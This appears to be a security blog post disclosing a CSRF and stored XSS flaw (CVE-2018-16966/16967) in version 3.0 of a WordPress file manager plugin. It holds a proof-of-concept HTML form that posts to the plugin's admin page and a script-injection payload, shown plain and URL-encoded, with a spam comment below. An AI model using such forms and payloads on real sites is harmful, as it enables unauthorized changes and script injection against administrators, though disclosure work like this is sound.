Ansari Web Sec: File Manager plugin for WordPress CVE-2018-16966 and CVE-2018-16967

Tuesday 2 April 2019

File Manager plugin for WordPress CVE-2018-16966 and CVE-2018-16967

Exploit Author : Mohammed Ansari S ( ansaert@gmail.com )

LinkedIn: https://www.linkedin.com/in/ansaert/

Discovered Date: September 11 2018

Affected Version: 3.0

Active installations: 200,000+

Plugin: https://wordpress.org/plugins/wp-file-manager/

1# CSRF and stored XSS - CVE-2018-16966 and CVE-2018-16967

Create *.html file

<form method="POST" action="http://localhost/wordpress498/wp-admin/admin.php?page=wp_file_manager_root">

<input type="text" name="public_path" value="typepayload"><br />

<input type="text" name="submit" value="Save Changes"><br />

<input type="submit">

</form>

Payload: "><script>alert(1);</script>

public_path=%22%3E%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E

1 comment:

WelderReview.com22 July 2019 at 01:54

Hello,

we provide affordable and result-oriented SEO services, please give a chance to serve you.

Thanks
Admin: E07.net
ReplyDelete
Replies

Subscribe to: Post Comments (Atom)